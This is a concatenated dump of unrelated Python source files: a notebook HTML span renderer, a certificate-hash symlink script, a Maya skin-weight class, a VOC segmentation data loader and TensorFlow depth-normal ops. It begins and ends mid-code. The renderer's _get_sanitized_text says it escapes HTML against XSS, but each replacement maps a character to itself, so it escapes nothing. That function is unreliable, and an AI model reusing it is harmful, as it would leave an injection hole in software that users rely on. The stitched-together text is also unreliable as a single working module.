<span style="font-size: 0.8em;color: #b3b3b3;">Your notebook viewer does not support Javascript execution. The above rendering will not be interactive.</span>
</div>
<script>
{{
const Span = window.SpanArray.Span
const script_context = document.currentScript
const documents = []
{''.join(instance_init_script_list)}
const instance = new window.SpanArray.SpanArray(documents, {show_offset_string}, script_context)
instance.render()
}}
</script>
{''.join(postfix_tags)}
""")
def _get_escaped_doctext(column: Union["SpanArray", "TokenSpanArray"]) -> str:
# Subroutine of pretty_print_html() above.
# Should only be called for single-document span arrays.
if not column.is_single_document:
raise ValueError("Array contains spans from multiple documents. Can only "
"render one document at a time.")
text = column.document_text
text_pieces = []
for i in range(len(text)):
if text[i] == "'":
text_pieces.append("\\'")
elif text[i] == "\n":
text_pieces.append("\\n")
else:
text_pieces.append(text[i])
return "".join(text_pieces)
def _get_initial_static_html(column: Union["SpanArray", "TokenSpanArray"],
show_offsets: bool) -> str:
# Subroutine of pretty_print_html above.
# Gets the initial static html representation of the column for notebook viewers without JavaScript support.
# Iterates over each document and constructs the DOM string with template literals.
# ! Text inserted into the DOM as raw HTML should always be sanitized to prevent unintended DOM manipulation
# and XSS attacks.
documents = column.split_by_document()
documents_html = []
for column_index in range(min(_DOCUMENT_DISPLAY_LIMIT, len(documents))):
document = documents[column_index]
# Generate a dictionary to store span information, including relationships with spans occupying the same region.
spans = {}
is_token_document = False
sorted_span_ids = []
for i in range(len(document)):
span_data = {}
span_data["id"] = i
span_data["begin"] = document[i].begin
span_data["end"] = document[i].end
if hasattr(document[i], "tokens"):
is_token_document = True
span_data["begin_token"] = document[i].begin_token
span_data["end_token"] = document[i].end_token
span_data["sets"] = []
spans[i] = span_data
sorted_span_ids.append(i)
# Sort IDs
sorted_span_ids.sort(key=lambda id: (spans[id]["begin"], -spans[id]["end"]))
for i in range(len(sorted_span_ids)):
span_data = spans[sorted_span_ids[i]]
for j in range(i+1, len(sorted_span_ids)):
sub_span_data = spans[sorted_span_ids[j]]
# If the spans do not overlap, exit the sub-loop
if(sub_span_data["begin"] >= span_data["end"]):
break
else:
if(sub_span_data["end"] <= span_data["end"]):
span_data["sets"].append({"type": SetType.NESTED, "id": sub_span_data["id"]})
else:
span_data["sets"].append({"type": SetType.OVERLAP, "id": sub_span_data["id"]})
spans[sorted_span_ids[i]] = span_data
# Generate the table rows DOM string from span data.
table_rows_html = []
for i in range(len(spans)):
span = spans[i]
table_rows_html.append(f"""
<tr>
<td><b>{span["id"]}</b></td>
<td>{span["begin"]}</td>
<td>{span["end"]}</td>
""")
if is_token_document:
table_rows_html.append(f"""
<td>{span["begin_token"]}</td>
<td>{span["end_token"]}</td>
""")
table_rows_html.append(f"""
<td>{_get_sanitized_text(document.document_text[span["begin"]:span["end"]])}</td>
</tr>
""")
# Generate the regions of the document_text to highlight from span data.
mark_regions = []
i = 0
while i < len(document):
region = {}
region["root_id"] = i
region["begin"] = spans[i]["begin"]
set_span = _get_set_span(spans, i)
region["end"] = set_span["end"]
if len(spans[i]["sets"]) > 0:
# get set span and type
if(_is_complex(spans, i)):
region["type"] = RegionType.COMPLEX
else:
region["type"] = RegionType.NESTED
else:
region["type"] = RegionType.SOLO
mark_regions.append(region)
i = set_span["highest_id"] + 1
# Generate the document_text DOM string from the regions created above.
context_html = []
if len(mark_regions) == 0:
# There are no marked regions. Just append the sanitized text as a raw string.
context_html.append(_get_sanitized_text(document.document_text))
else:
# Iterate over each marked region and construct the HTML for preceding text and marked text.
# Then, append that HTML to the list of DOM strings for the document_text.
snippet_begin = 0
for region in mark_regions:
context_html.append(f"""
{_get_sanitized_text(document.document_text[snippet_begin:region["begin"]])}
""")
if region["type"] == RegionType.COMPLEX:
context_html.append(f"""
<span class='mark btn-info complex-set' style='
padding:0.4em;
border-radius:0.35em;
background:linear-gradient(to right, #a0c4ff, #ffadad);
color: black;
'>{_get_sanitized_text(document.document_text[region["begin"]:region["end"]])}
<span class='mark-tag' style='
font-weight: bolder;
font-size: 0.8em;
font-variant: small-caps;
font-variant-caps: small-caps;
font-variant-caps: all-small-caps;
margin-left: 8px;
text-transform: uppercase;
color: black;
'>Set</span>
</span>
""")
elif region["type"] == RegionType.NESTED:
mark_html = []
nested_snippet_begin = region["begin"]
# Iterate over each span nested within the root span of the marked region
for nested_span in map( \
lambda set: spans[set["id"]],
spans[region["root_id"]]["sets"]):
mark_html.append(f"""
{_get_sanitized_text(document.document_text[nested_snippet_begin:nested_span["begin"]])}
<span class='mark btn-warning' style='
padding:0.2em 0.4em;
border-radius:0.35em;
background-color: #ffadad;
color: black;
'>{_get_sanitized_text(document.document_text[nested_span["begin"]:nested_span["end"]])}</span>
""")
nested_snippet_begin = nested_span["end"]
mark_html.append(_get_sanitized_text(document.document_text[nested_snippet_begin:region["end"]]))
context_html.append(f"""
<span class='mark btn-primary' style='padding:0.4em;border-radius:0.35em;background-color: #a0c4ff;color:black;'>{"".join(mark_html)}</span>
""")
elif region["type"] == RegionType.SOLO:
context_html.append(f"""
<span class='mark btn-primary' style='padding:0.4em;border-radius:0.35em;background-color: #a0c4ff;color:black;'>{_get_sanitized_text(document.document_text[region["begin"]:region["end"]])}</span>
""")
snippet_begin = region["end"]
context_html.append(_get_sanitized_text(document.document_text[snippet_begin:]))
# Generate the document's DOM string
documents_html.append(f"""
<div class='document'>
<table style='
table-layout: auto;
overflow: hidden;
width: 100%;
border-collapse: collapse;
'>
<thead style='font-variant-caps: all-petite-caps;'>
<th></th>
<th>begin</th>
<th>end</th>
{"<th>begin token</th><th>end token</th>" if is_token_document else ""}
<th style='text-align:right;width:100%'>context</th>
</tr></thead>
<tbody>
{"".join(table_rows_html)}
</tbody>
</table>
<p style='
padding: 1em;
line-height: calc(var(--jp-content-line-height, 1.6) * 1.6);
'>
{"".join(context_html)}
</p>
</div>
""")
# Concat all documents and return the final DOM string
return "".join(documents_html)
def _get_set_span(spans: Dict, id: int) -> Dict:
# Subroutine of _get_initial_static_html() above.
# Recursive algorithm to get the last end and ID values of the set of spans connected to span with the given ID
# Will raise a KeyError exception if an invalid key is given
end = spans[id]["end"]
highest_id = id
# For each span in the set of spans, get the return values and track the greatest endpoint index and ID values.
for set in spans[id]["sets"]:
other = _get_set_span(spans, set["id"])
if other["end"] > end:
end = other["end"]
if other["highest_id"] > highest_id:
highest_id = other["highest_id"]
return {"end": end, "highest_id": highest_id}
def _is_complex(spans: Dict, id: int) -> bool:
# Subroutine of _get_initial_static_html() above.
# Returns True if the provided span should be considered a "Complex" span. Implementation details below.
# Will raise a KeyError exception if an invalid key is given
# If any connection sets are of type:overlap or nested beyond a depth of 1, return True
for set in spans[id]["sets"]:
if set["type"] == SetType.OVERLAP:
return True
elif set["type"] == SetType.NESTED:
if len(spans[set["id"]]["sets"]) > 0:
return True
return False
def _get_sanitized_text(text: str) -> str:
# Subroutine of _get_initial_static_html() above.
# Returns a string with HTML reserved character replacements to avoid issues while rendering text as HTML
text_pieces = []
for i in range(len(text)):
if text[i] == "&":
text_pieces.append("&")
elif text[i] == "<":
text_pieces.append("<")
elif text[i] == ">":
text_pieces.append(">")
elif text[i] == "\"":
# Not strictly necessary, but just in case.
text_pieces.append(""")
elif text[i] == "'":
# Not strictly necessary, but just in case.
text_pieces.append("'")
elif text[i] == "$":
# Dollar sign messes up Jupyter's JavaScript UI.
# Place dollar sign in its own sub-span to avoid being misinterpeted as a LaTeX delimiter
text_pieces.append("<span>$</span>")
elif text[i] == "\n" or text[i] == "\r":
# Support for in-document newlines by replacing with line break elements
text_pieces.append("<br>")
else:
text_pieces.append(text[i])
return "".join(text_pieces)
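# Editor's note: hedged usage sketch, not part of the original module. In a
# notebook one would typically wrap the returned markup, assuming `spans` is a
# SpanArray or TokenSpanArray column:
#
#     from IPython.display import HTML
#     HTML(pretty_print_html(spans, show_offsets=True))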
|
support/distribute/binbuild/build/make_cert_links.py | rknop/amuse | 131 | 30081 | import os
import os.path
import subprocess
import sys
if __name__ == "__main__":
dirname = sys.argv[1]
for x in os.listdir(dirname):
if x.endswith('.crt'):
try:
filename = os.path.join(dirname, x)
filehash = subprocess.check_output(['openssl', 'x509', '-noout', '-hash', '-in', filename]).strip().decode('ascii')  # decode so the '.0' suffix concatenates under Python 3
filehash += '.0'
hash_filename = os.path.join(dirname, filehash)
if os.path.exists(hash_filename):
print(x, filehash)
os.remove(hash_filename)
os.symlink(x, hash_filename)
except:
print("error in handling file:", filename)
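# Editor's note: hedged usage sketch (the directory is a placeholder):
#   python make_cert_links.py /path/to/cert/dir
# For every .crt file this mimics `c_rehash`, symlinking it to its OpenSSL
# subject-hash name with a ".0" suffix.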
|
DeformationLearningSolver/scripts/DLS/core/fnData.py | WebberHuang/DeformationLearningSolver | 160 | 30083 |
__author__ = "<NAME>"
__contact__ = "<EMAIL>"
__website__ = "http://riggingtd.com"
import maya.cmds as cmds
import maya.OpenMaya as om
import maya.OpenMayaAnim as oma
from DLS.core import utils
class FnSkinCluster(object):
def __init__(self, skinCluster=None):
"""
Args:
skinCluster (str, Optional): Defaults to None
"""
self.skinCluster = skinCluster
if skinCluster:
self.fn = oma.MFnSkinCluster(utils.getDependNode(skinCluster))
def setSkinCluster(self, skinCluster):
"""
Args:
skinCluster (str, Optional): Defaults to None
Returns:
SkinClusterFn
"""
self.skinCluster = skinCluster
self.fn = oma.MFnSkinCluster(utils.getDependNode(skinCluster))
return self
def getLogicalInfluenceIndex(self,influence):
"""
Args:
influence (str)
Returns:
int
"""
try:
dagPath = utils.getDagPath(influence)
except:
raise utils.UserInputError("Could not find influence '%s' in %s" %
(influence, self.skinCluster))
return self.fn.indexForInfluenceObject(dagPath)
#----------------------------------------------------------------------
def getPhysicalInfluenceIndex(self, influence):
"""
Args:
influence (str)
Returns:
int
"""
matrices = cmds.listConnections("%s.matrix" % self.skinCluster, s=1, d=0)
return matrices.index(influence)
#----------------------------------------------------------------------
def getInfluenceData(self, influence):
"""
Args:
influence (str)
Returns:
WeightData
"""
try:
dagPath = utils.getDagPath(influence)
except:
raise utils.UserInputError("Could not find influence '%s' in %s" %
(influence, self.skinCluster))
selList = om.MSelectionList()
weights = om.MDoubleArray()
self.fn.getPointsAffectedByInfluence(dagPath, selList, weights)
componentStr = []
selList.getSelectionStrings(componentStr)
componentStr = cmds.ls(componentStr, ap=1, fl=1)
weights = [w for w in weights]
return WeightData(componentStr, weights)
#----------------------------------------------------------------------
def listInfluences(self, asDagPath=True):
"""
Returns:
list
"""
dagPaths = om.MDagPathArray()
self.fn.influenceObjects(dagPaths)
if asDagPath: return dagPaths
else: return [dagPaths[i].partialPathName() for i in xrange(dagPaths.length())]
#----------------------------------------------------------------------
def getWeightData(self, elements):
"""
Args:
elements (list)
Returns:
SkinWeightData
"""
dagPath, components = utils.getDagPathComponents(elements)
# Get all influences
infs = self.listInfluences(asDagPath=False)
influenceIndices = om.MIntArray()
[influenceIndices.append(self.getPhysicalInfluenceIndex(inf)) for inf in infs]
# Get all weights
weights = om.MDoubleArray()
self.fn.getWeights(dagPath, components, influenceIndices, weights)
weights = [w for w in weights]
return SkinWeightData(elements, infs, weights)
#----------------------------------------------------------------------
def setWeightData(self, data, normalize=True):
"""
Args:
data (SkinWeightData)
normalize (bool, Optional): Defaults to True
"""
# Construct dagPath and components
compList = data.getComponents()
dagPath, components = utils.getDagPathComponents(compList)
# Construct influence indices
influenceIndices = om.MIntArray()
[influenceIndices.append(self.getPhysicalInfluenceIndex(inf)) for inf in data.getInfluences()]
# Construct weights
weights = om.MDoubleArray()
[weights.append(w) for w in data.getWeights()]
oldValues = om.MDoubleArray()
self.fn.getWeights(dagPath, components, influenceIndices, oldValues)
self.fn.setWeights(dagPath, components, influenceIndices, weights, normalize, oldValues)
#----------------------------------------------------------------------
def flushWeights(self, influence):
"""
Args:
influence (str)
"""
weightData = self.getInfluenceData(influence)
skinData = SkinWeightData(weightData.getElements(), [influence], weightData.getWeights())
[skinData.addInfluence(comp, influence, 0.0) for comp in skinData.getComponents()]
self.setWeightData(skinData)
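# Editor's note: hedged usage sketch, not part of the original class. Inside
# Maya's script editor one might do (node and joint names are placeholders):
#     fn = FnSkinCluster("skinCluster1")
#     data = fn.getWeightData(cmds.ls("pSphere1.vtx[*]", ap=1, fl=1))
#     fn.setWeightData(data)       # round-trips the stored weights
#     fn.flushWeights("joint3")    # zero one influence, renormalizing the rest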
#----------------------------------------------------------------------
def getInfluenceTransforms(self, space=om.MSpace.kObject):
infs = self.listInfluences()
if space == om.MSpace.kWorld:
return [infs[i].inclusiveMatrix() for i in xrange(infs.length())]
return [om.MFnTransform(infs[i]).transformation().asMatrix()
for i in xrange(infs.length())] |
datasets/Voc_Dataset.py | DLsnowman/Deeplab-v3plus | 333 | 30117 |
# -*- coding: utf-8 -*-
# @Time : 2018/9/21 17:21
# @Author : HLin
# @Email : <EMAIL>
# @File : Voc_Dataset.py
# @Software: PyCharm
import PIL
import random
import scipy.io
from PIL import Image, ImageOps, ImageFilter
import numpy as np
import cv2
import os
import torch
import torch.utils.data as data
import torchvision.transforms as ttransforms
class Voc_Dataset(data.Dataset):
def __init__(self,
root_path='/data/linhua/VOCdevkit',
dataset='voc2012_aug',
base_size=513,
crop_size=513,
is_training=True):
"""
:param root_path:
:param dataset:
:param base_size:
:param crop_size:
:param is_training:
"""
self.dataset = dataset
self.is_training = is_training
self.base_size = base_size
self.crop_size = crop_size
if self.dataset == 'voc2007':
self.data_path = os.path.join(root_path, "VOC2007")
if is_training:
item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/trainval.txt")
else:
item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/test.txt")
elif self.dataset == 'voc2012':
self.data_path = os.path.join(root_path, "VOC2012")
if is_training:
item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/train.txt")
else:
item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/val.txt")
elif self.dataset == 'voc2012_aug':
self.data_path = os.path.join(root_path, "VOC2012")
if is_training:
item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/train_aug.txt")
else:
item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/val_aug.txt")
else:
raise Warning("dataset must be voc2007 or voc2012 or voc2012_aug")
self.image_filepath = os.path.join(self.data_path, "JPEGImages")
self.gt_filepath = os.path.join(self.data_path, "SegmentationClassAug")
self.items = [id.strip() for id in open(item_list_filepath)]
self.classes = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow',
'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train',
'tvmonitor']
def __getitem__(self, item):
id = self.items[item]
gt_image_path = os.path.join(self.gt_filepath, "{}.png".format(id))
gt_image = Image.open(gt_image_path)
image_path = os.path.join(self.image_filepath, "{}.jpg".format(id))
image = Image.open(image_path).convert("RGB")
if self.is_training:
image, gt_image = self._train_sync_transform(image, gt_image)
else:
image, gt_image = self._val_sync_transform(image, gt_image)
return image, gt_image, id
def _train_sync_transform(self, img, mask):
'''
:param image: PIL input image
:param gt_image: PIL input gt_image
:return:
'''
# random mirror
if random.random() < 0.5:
img = img.transpose(Image.FLIP_LEFT_RIGHT)
mask = mask.transpose(Image.FLIP_LEFT_RIGHT)
crop_size = self.crop_size
# random scale (short edge)
short_size = random.randint(int(self.base_size * 0.5), int(self.base_size * 2.0))
w, h = img.size
if h > w:
ow = short_size
oh = int(1.0 * h * ow / w)
else:
oh = short_size
ow = int(1.0 * w * oh / h)
img = img.resize((ow, oh), Image.BILINEAR)
mask = mask.resize((ow, oh), Image.NEAREST)
# pad crop
if short_size < crop_size:
padh = crop_size - oh if oh < crop_size else 0
padw = crop_size - ow if ow < crop_size else 0
img = ImageOps.expand(img, border=(0, 0, padw, padh), fill=0)
mask = ImageOps.expand(mask, border=(0, 0, padw, padh), fill=0)
# random crop crop_size
w, h = img.size
x1 = random.randint(0, w - crop_size)
y1 = random.randint(0, h - crop_size)
img = img.crop((x1, y1, x1 + crop_size, y1 + crop_size))
mask = mask.crop((x1, y1, x1 + crop_size, y1 + crop_size))
# gaussian blur as in PSP
if random.random() < 0.5:
img = img.filter(ImageFilter.GaussianBlur(
radius=random.random()))
# final transform
img, mask = self._img_transform(img), self._mask_transform(mask)
return img, mask
def _val_sync_transform(self, img, mask):
outsize = self.crop_size
short_size = outsize
w, h = img.size
if w > h:
oh = short_size
ow = int(1.0 * w * oh / h)
else:
ow = short_size
oh = int(1.0 * h * ow / w)
img = img.resize((ow, oh), Image.BILINEAR)
mask = mask.resize((ow, oh), Image.NEAREST)
# center crop
w, h = img.size
x1 = int(round((w - outsize) / 2.))
y1 = int(round((h - outsize) / 2.))
img = img.crop((x1, y1, x1 + outsize, y1 + outsize))
mask = mask.crop((x1, y1, x1 + outsize, y1 + outsize))
# final transform
img, mask = self._img_transform(img), self._mask_transform(mask)
return img, mask
def _img_transform(self, image):
image_transforms = ttransforms.Compose([
ttransforms.ToTensor(),
ttransforms.Normalize([.485, .456, .406], [.229, .224, .225]),
])
image = image_transforms(image)
return image
def _mask_transform(self, gt_image):
target = np.array(gt_image).astype('int32')
target = torch.from_numpy(target)
return target
def __len__(self):
return len(self.items)
class VOCDataLoader():
def __init__(self, args):
self.args = args
train_set = Voc_Dataset(dataset=self.args.dataset,
base_size=self.args.base_size,
crop_size=self.args.crop_size,
is_training=True)
val_set = Voc_Dataset(dataset=self.args.dataset,
base_size=self.args.base_size,
crop_size=self.args.crop_size,
is_training=False)
self.train_loader = data.DataLoader(train_set,
batch_size=self.args.batch_size,
shuffle=True,
num_workers=self.args.data_loader_workers,
pin_memory=self.args.pin_memory,
drop_last=True)
self.valid_loader = data.DataLoader(val_set,
batch_size=self.args.batch_size,
shuffle=False,
num_workers=self.args.data_loader_workers,
pin_memory=self.args.pin_memory,
drop_last=True)
self.train_iterations = (len(train_set) + self.args.batch_size) // self.args.batch_size
self.valid_iterations = (len(val_set) + self.args.batch_size) // self.args.batch_size
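# Editor's note: hedged usage sketch, not part of the original file. `args` is
# assumed to be the project's config object exposing dataset, base_size,
# crop_size, batch_size, data_loader_workers and pin_memory:
#     loader = VOCDataLoader(args)
#     for images, gt_masks, ids in loader.train_loader:
#         pass  # images: (B,3,crop,crop) float, gt_masks: (B,crop,crop) int32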
if __name__ == '__main__':
data=scipy.io.loadmat('/data/linhua/VOCdevkit/BSD/dataset/cls/2008_003846.mat')
print(data['GTcls']["Segmentation"][0,0])
print(np.array([[(1,2,3)]]).shape)
print(np.array([[np.array(1), np.array(2), np.array(3)]]).shape) |
src/ops.py | Elite-Volumetric-Capture-Sqad/DDRNet | 128 | 30128 |
import numpy as np
import sys
import tensorflow as tf
slim = tf.contrib.slim
def convertNHWC2NCHW(data, name):
out = tf.transpose(data, [0, 3, 1, 2], name=name)
return out
def convertNCHW2NHWC(data, name):
out = tf.transpose(data, [0, 2, 3, 1], name=name)
return out
def denormalize(batch_input, low_thres, up_thres, zero2one=False, rm_zeros=False, eps=10.0):
# denormalize depth from [-1, 1] to real depth.
if not zero2one: # [-1, 1]
rel_input = (batch_input + 1.0) / 2.0
else: # [0, 1]
rel_input = batch_input
denormalized = rel_input * (up_thres - low_thres) + low_thres
if rm_zeros:
low_mask = tf.less(denormalized, low_thres+eps, name='low_mask')
zero_const = tf.zeros_like(denormalized)
denormalized = tf.where(low_mask, zero_const, denormalized)
return denormalized
def compute_normals(depth, config, conv=False, eps=1e-4):
# convert NHWC depth to NCHW normal
with tf.variable_scope("depth_to_normal"):
intrinsics = tf.constant([[536.628 / 640.0, 536.606 / 480.0, 310.591 / 640.0, 234.759 / 480.0]])
intrinsics = tf.tile(intrinsics, [config.batch_size, 1])
depth_real = convertNHWC2NCHW(
denormalize(depth, low_thres=config.low_thres, up_thres=config.up_thres), name='depth_NCHW')
normals = depth_to_normals_tf(depth_real, intrinsics)
if conv:
kernel_size = 3
stride = 1
in_channels = normals.get_shape()[1]
assert in_channels == 3, 'normals should have 3 channel instead of {}.'.format(in_channels)
normal_filter = tf.get_variable("filter",
[kernel_size, kernel_size, 1, 1],
dtype=tf.float32,
initializer=tf.constant_initializer(1.0/(kernel_size*kernel_size)),
trainable=False)
normals1, normals2, normals3 = tf.split(convertNCHW2NHWC(normals, 'normals_NHWC'), 3, axis=3)
normals1 = tf.nn.conv2d(normals1, normal_filter,
[1, stride, stride, 1], 'SAME', name='normal_conv_r')
normals2 = tf.nn.conv2d(normals2, normal_filter,
[1, stride, stride, 1], 'SAME', name='normal_conv_g')
normals3 = tf.nn.conv2d(normals3, normal_filter,
[1, stride, stride, 1], 'SAME', name='normal_conv_b')
normals = tf.concat([normals1, normals2, normals3], 3)
unused = tf.less(tf.norm(normals, axis=3), np.sqrt(eps))
unused = tf.stack([unused]*3, axis=3)
normals = tf.nn.l2_normalize(normals, 3, epsilon=eps, name='normalize_normals')
normals = tf.where(unused, tf.zeros_like(normals), normals)
normals = convertNHWC2NCHW(normals, name='normals_NCHW')
return normals
def depth_to_normals_tf(depth, intrinsics, scope=None, eps=1e-4):
"""
:param depth: real depth (B,1,H,W)
:param intrinsics: (B,4)
:return: normals (B,3,H,W)
"""
with tf.name_scope(scope, 'depth_to_normals_tf', [depth, intrinsics]):
H, W = depth.shape.as_list()[-2:]
B = tf.shape(depth)[0] # config.batch_size
depth = tf.reshape(depth, [B, H, W])
# fx_rel = fx_abs / W, cx_rel = cx_abs / W
fx, fy, cx, cy = tf.split(tf.expand_dims(intrinsics, 2), 4, axis=1) # (B,1,1)
inv_fx = tf.div(1.0, fx * W)
inv_fy = tf.div(1.0, fy * H)
cx = cx * W
cy = cy * H
X, Y = tf.meshgrid(tf.range(W), tf.range(H))
X = tf.cast(tf.tile(tf.expand_dims(X, axis=0), [B, 1, 1]), tf.float32) # (B,H,W)
Y = tf.cast(tf.tile(tf.expand_dims(Y, axis=0), [B, 1, 1]), tf.float32)
x_cord = (X - cx) * inv_fx * depth
y_cord = (Y - cy) * inv_fy * depth
p = tf.stack([x_cord, y_cord, depth], axis=3, name='p_3d') # (B,H,W,3)
# vector of p_3d in west, south, east, north direction
p_ctr = p[:, 1:-1, 1:-1, :]
vw = p_ctr - p[:, 1:-1, 2:, :]
vs = p[:, 2:, 1:-1, :] - p_ctr
ve = p_ctr - p[:, 1:-1, :-2, :]
vn = p[:, :-2, 1:-1, :] - p_ctr
normal_1 = tf.cross(vs, vw, name='cross_1') # (B,H-2,W-2,3)
normal_2 = tf.cross(vn, ve, name='cross_2')
normal_1 = tf.nn.l2_normalize(normal_1, 3, epsilon=eps)
normal_2 = tf.nn.l2_normalize(normal_2, 3, epsilon=eps)
normal = normal_1 + normal_2
# unused = tf.less(tf.norm(normal, axis=3), np.sqrt(eps))
# unused = tf.stack([unused] * 3, axis=3)
normal = tf.nn.l2_normalize(normal, 3, epsilon=eps, name='normal')
# normal = tf.where(unused, tf.zeros_like(normal), normal)
paddings = [[0, 0], [1, 1], [1, 1], [0, 0]]
normal = tf.pad(normal, paddings) # (B,H,W,3)
normal = convertNHWC2NCHW(normal, 'normal_NCHW')
return normal
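# Editor's note: hedged shape sketch, not part of the original ops file.
# Intrinsics are passed relative to image size (fx/W, fy/H, cx/W, cy/H), matching
# the constant used in compute_normals(); the values below are illustrative only.
def _example_depth_to_normals():
    depth = tf.ones([2, 1, 480, 640]) * 1500.0  # (B,1,H,W) real depth, e.g. millimetres
    intrinsics = tf.constant([[536.628 / 640.0, 536.606 / 480.0,
                               310.591 / 640.0, 234.759 / 480.0]] * 2)  # (B,4)
    return depth_to_normals_tf(depth, intrinsics)  # (B,3,H,W) unit normals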
def instance_norm(input):
with tf.variable_scope("instance_norm"):
input = tf.identity(input)
channels = input.get_shape()[3]
shift = tf.get_variable("shift", [channels], dtype=tf.float32, initializer=tf.zeros_initializer())
scale = tf.get_variable("scale", [channels], dtype=tf.float32,
initializer=tf.random_normal_initializer(1.0, 0.02))
mean, variance = tf.nn.moments(input, [1, 2], keep_dims=True)
variance_epsilon = 1e-5
normalized = tf.nn.batch_normalization(input, mean, variance, shift, scale, variance_epsilon=variance_epsilon,
name='instancenorm')
return normalized
@slim.add_arg_scope
def lrelu(inputs, leak=0.2, scope="lrelu"):
"""
For tf > 1.4, use tf.nn.leaky_relu()
decorate a func with slim.add_arg_scope so that it can be used within an arg_scope in a slim way.
"""
with tf.variable_scope(scope):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * inputs + f2 * abs(inputs)
def conv_bn_relu(batch_input, kernel_size, stride, out_channels=None):
with tf.variable_scope("conv_bn_relu"):
in_channels = batch_input.get_shape()[3]
if not out_channels: out_channels = in_channels
filter = tf.get_variable("filter", [kernel_size, kernel_size, in_channels, out_channels],
dtype=tf.float32, initializer=tf.random_normal_initializer(0, 0.02))
convolved = tf.nn.conv2d(batch_input, filter, [1, stride, stride, 1], padding="SAME")
normed = batchnorm_u(convolved)
rectified = tf.nn.relu(normed)
return rectified, filter
def resize_conv(x, out_ch, k_size, size_factor):
_, in_h, in_w, in_ch = x.shape.as_list()
resized = tf.image.resize_nearest_neighbor(x, [in_h * size_factor, in_w * size_factor])
conv = conv_act(resized, out_ch, k_size, 1)
return conv
def resize_add_conv_u(input, size_factor, out_ch=None, k_size=3, axis=3, act=tf.nn.relu):
"""
Bilinear Additive Upsampling. see:
Wojna, Zbigniew, et al. "The Devil is in the Decoder." arXiv preprint arXiv:1707.05847 (2017).
"""
with tf.variable_scope("resize_add_conv") as scp:
_, in_height, in_width, in_ch = input.shape.as_list()
if out_ch:
assert in_ch % out_ch == 0, 'cannot add in_ch: {} to out_ch: {}'.format(in_ch, out_ch)
else:
out_ch, r = divmod(in_ch, (size_factor * size_factor))
assert r == 0, 'in_ch: {} not divisible by size_factor^2'.format(in_ch)
ch_split = in_ch // out_ch  # integer channel split (in_ch is asserted divisible by out_ch)
# bilinear upsample
resized = tf.image.resize_images(input, [in_height * size_factor, in_width * size_factor])
stack_list = []
for i in range(out_ch):
resized_split = resized[:, :, :, i * ch_split:(i + 1) * ch_split]
stack_list.append(tf.reduce_sum(resized_split, axis=axis))
stacked = tf.stack(stack_list, axis=axis)
filter = tf.get_variable("filter", [k_size, k_size, out_ch, out_ch], dtype=tf.float32,
initializer=tf.random_normal_initializer(0, 0.02))
conv = tf.nn.conv2d(stacked, filter, [1, 1, 1, 1], padding="SAME")
if act is not None:
conv = tf.nn.relu(conv)
return conv
def conv_concat(input, skip, axis, conv=True):
with tf.variable_scope("concat"):
in_ch = input.shape[3]
if conv:
skip, _ = conv_bn_relu(skip, 3, 1, out_channels=in_ch)
return tf.concat([input, skip], axis)
def resize_like(inputs, ref, method='NN'):
iH, iW = inputs.shape[1], inputs.shape[2]
rH, rW = ref.shape[1], ref.shape[2]
if iH == rH and iW == rW:
return inputs
if method == 'NN':
return tf.image.resize_nearest_neighbor(inputs, [rH.value, rW.value])
elif method == 'BI':
return tf.image.resize_bilinear(inputs, [rH.value, rW.value])
else:
raise NotImplementedError('resize method not implemented yet.')
def residual_block(inputs, ch_out, stride=1, norm_fn=slim.batch_norm, outputs_collections=None, scope=None):
"""
Residual_block with pre-activation.
see resnet_model.py for more detailed version.
"""
with tf.variable_scope(scope, "residual_block") as scp:
shortcut = tf.identity(inputs, name="shortcut")
if norm_fn:
preact = norm_fn(inputs, activation_fn=tf.nn.relu, scope="preact")
else:
preact = tf.nn.relu(inputs, name="preact")
residual = slim.conv2d(preact, ch_out, [3, 3], stride=stride, normalizer_fn=norm_fn, activation_fn=tf.nn.relu,
scope="conv1")
residual = slim.conv2d(residual, ch_out, [3, 3], stride=stride, normalizer_fn=None, activation_fn=None,
scope="conv2")
output = shortcut + residual
return output
def rand_shift_depth(depths, low_th, up_th, seed=666):
"""
:param depths: list of depth maps to be randomly shifted together.
        depth values should be in range [low_th, up_th]
:return: list of shifted depth maps
"""
if len(depths) > 1:
depth_ref = depths[1]
else:
depth_ref = depths[0]
ref_min = tf.reduce_min(depth_ref)
ref_max = tf.reduce_max(depth_ref)
shift_min = low_th - ref_min
shift_max = up_th - ref_max
shift_val = tf.random_uniform([], minval=shift_min, maxval=shift_max, seed=seed, name='shift_val')
depths_shifted = [tf.clip_by_value(d + shift_val, low_th, up_th) for d in depths]
return depths_shifted
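# Worked example for rand_shift_depth: with low_th=500, up_th=3000 and a reference
# depth map spanning [800, 2500], shift_val is drawn uniformly from [-300, 500], so
# the shifted maps still lie inside the allowed depth range before clipping.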
def read_image_from_filename(filename, batch_size, num_threads=4, has_mask=True, has_abd=False,
aux_type="JPEG", depth_type=tf.uint16,
low_th=500.0, up_th=3000.0, diff_th=5.0,
output_height=256, output_width=256,
min_after_dequeue=128, use_shuffle_batch=False,
rand_crop=True, rand_scale=False, rand_depth_shift=False, rand_flip=True, rand_brightness=True,
scope=None):
"""
:param filename: index csv file for training.
:param batch_size: 16 or 32 recommended for Titan X.
:param num_threads: 4 or 8.
:param has_mask: single channel [0, 255]. offline mask obtained by threshold, instance segmentation or other methods.
:param has_abd: offline albedo obtained by intrinsic decomposition methods, if False assume uniform albedo.
:param aux_type: auxiliary(e.g. color) image file type.
:param depth_type: data type of depth maps.
:param low_th: limited lower bound of depth range.
:param up_th: limited upper bound of depth range.
:param diff_th: threshold to reject bad training pairs with large L1 diff.
:param output_height: patch height.
:param output_width: patch width.
:param min_after_dequeue: see docs of tf.train.shuffle_batch.
:param use_shuffle_batch: see docs of tf.train.shuffle_batch.
:param rand_crop: random cropping patches for training, change cx, cy.
:param rand_flip: random flipping patches, change cx, cy.
:param rand_scale: random scaling, change fx, fy, cx, cy.
:param rand_depth_shift: only shift depth value, no change in intrinsics.
:param rand_brightness: augment color image.
:param scope: visualize graphs in tensorboard.
